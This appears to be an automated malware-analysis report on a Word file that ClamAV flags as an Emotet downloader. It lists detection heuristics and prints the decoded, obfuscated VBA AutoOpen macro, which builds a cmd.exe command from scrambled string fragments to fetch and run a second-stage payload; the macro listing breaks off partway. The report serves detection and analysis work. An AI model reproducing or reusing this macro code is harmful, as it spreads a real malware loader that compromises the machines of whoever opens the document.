MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6883999-0', indicating it's likely an Emotet downloader. The presence of an AutoOpen VBA macro, detected by multiple heuristics, strongly suggests an automated execution path. The macro attempts to construct and execute a command using 'cmd.exe', likely to download and run a secondary payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6883999-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6883999-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5203 bytes |
SHA-256: 4bb8c0dbacb68b418e056803e4f16a4ceec5c84871505980f20c3fae448d42d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uFkwztOTWpLU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Chr(331882338)
TypeName Chr(NLKvZZ)
TypeName CInt(60053 * RjYGW)
TypeName CStr(WGtYdM)
TypeName Sin(lFLFT)
TypeName CSng(7774 + 12384 + nqPQRa / QjYcK)
Shell@ CStr("c") + CStr("m") + SopblkLwvu + IAEbvWK + iQuTJzTu + wiFUnz + lpvivCH + spSpMtknAqFdSE, 704546464 - 704546464
TypeName Chr(60104 * nYBGkb)
TypeName CByte(69375 / 8688)
End Sub
Attribute VB_Name = "jiBJIZkVJd"
Function iQuTJzTu()
On Error Resume Next
TypeName LIiMZs
TypeName 531734987
TypeName Oct(2)
zCMSBRoj = "d /V/C" + CStr(Chr(XofXwaJH + KVniIcjhQAvt + 34 + iFEahtIzWG + lnAMRZZTIPPuG)) + "s" + "et" + " LX" + "FN" + "=FVqk" + "wiKtOks" + "NXKDQGXPmQ"
TypeName 92
TypeName Rnd(694)
TypeName Otwbd
AEVVHTz = "zlj;$Yrvc" + ":/ a)u" + "y" + "\H" + "d'U" + "WB3b(" + "enx9" + "}" + ".@I,2=o" + "EhS-Rp+f{4"
TypeName Sin(QsaOwU + ROCHwh / 38524 / SWozGj)
TypeName Tan(EfUGhT)
ifGMzpQZBfl = "C&&fo" + "r %" + "Z in (64,5" + "8,4,47,27" + ",10,60,4"
TypeName 5
TypeName Tan(zuPEza)
aFDLScn = "7,22," + "22,32,25" + ",2," + "33," + "64,5" + "7,48" + ",47," + "4,62,58"
TypeName CInt(129571863)
TypeName CByte(72110 + vMjZN - GwpKF - OVjiOF)
TypeName 5
tOobMakQCdV = ",45,23,47" + "," + "29,7,32,11" + ",47," + "7,52,42," + "47,45,6" + "9,22," + "5,47,48," + "7,24,25," + "21,23,63,5" + "7,40," + "60,7,7,64" + ",30,3"
TypeName Sgn(EkZVO)
TypeName ckFpL
BcXKb = "1,31," + "47,44,39," + "33,5,52" + ",2" + "9,58,19" + ",31,11,1" + "6,53" + ",60,7,7"
TypeName Sgn(3)
TypeName Oct(62919 / KNjEj)
TypeName Sin(10095 / 2702)
uDvBQlizI = ",64,30,3" + "1" + ",31,45,47" + ",22," + "5" + ",47,66,6" + "2,10,3" + "6,10,7,47," + "19," + "10,5" + "2,29,5" + "8,19,"
TypeName 19109829
TypeName 1113
SlAoMa = "31,20,18," + "56," + "5," + "59,5" + "3" + ",60,7," + "7,64," + "30," + "31" + ",31,33,"
TypeName CSng(442677)
TypeName CSng(83932 / iIwAru)
TypeName MazADN
jwDzzKq = "45,3" + "3,9,3" + "5,10,62,45" + ",5,3" + "5,27,58,52" + ",48,47,7," + "31,31,2" + "6," + "50,64,4" + "1,20,2" + "," + "43,43,53,6" + "0"
TypeName Hex(4617)
TypeName 526
TypeName jmIUrT
NLMTljL = ",7,7,64,30" + "," + "31,31,44,1" + "9,35,10," + "5,29,52,4"
iQuTJzTu = zCMSBRoj + AEVVHTz + ifGMzpQZBfl + aFDLScn + tOobMakQCdV + BcXKb + uDvBQlizI + SlAoMa + jwDzzKq + NLMTljL
TypeName Hex(RSSYz)
TypeName KrfcPf
End Function
Function wiFUnz()
On Error Resume Next
TypeName MzOVK
TypeName Oct(sFwVw / cftLK / nEjXP + RuHbC)
TypeName Int(GzBJWA)
jwBzNROG = "8,47,7,31," + "5,38,54,1" + "0,53,6" + "0,7,7," + "64,30,31,3" + "1,23" + ",58,45" + ",33" + ",27,45," + "33," + "5"
TypeName CSng(2)
TypeName CByte(289178597)
TypeName imDAXm
arsfNMw = "2," + "29,5" + "8" + ",19,3" + "1," + "4,64,62," + "29,5" + "8,48" + ",7,47,4" + "8,7,31,3" + "6,44,0," + "16,"
TypeName Log(283116337)
TypeName 406617831
TypeName zARCJi
HAQwnKL = "40" + ",52,61,6" + "4,22,5,7,4" + "6,40," + "53,40,34,"
TypeName Cos(WKZIb)
TypeName CInt(814)
JuOVf = "24," + "25," + "23," + "8" + ",23,32,57" + ",32,40"
TypeName CBool(830)
TypeName 9
vEipKqYqNpa = ",68" + ",56," + "56" + ",40,24,2" + "5,2,69" + ",28,57," + "25,47,48," + "28,30,7,"
TypeName UwPlm
TypeName Tan(CEWtB)
wNbzlAaGD = "47," + "19,6" + "4" + ",65,4" + "0,3" + "7,40,65,25" + ",23,8," + "23,65,40,5" + "2,4" + "7,49,47," + "40,24,6"
TypeName 159
TypeName 235607262
KjcWAuwAKMk = "6" + ",5" + "8,27" + ",47,33" + ",29,6" + "0,46,25,4" + "8" + ",2,5,32,5" + ",48,32," + "2" + "5,21" + ",23,63,34," + "67,7,27,36"
TypeName Sgn(fVnXwI)
TypeName Chr(UFQQIc * rvjhDv)
TypeName Round(304007820)
YwzWhVHb = ",67," + "25,2,33," + "64,52,14," + "58" + ",4,48,22,5" + "8,33,39,0," + "5,22,47,4" + "6,25,48"
TypeNam
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.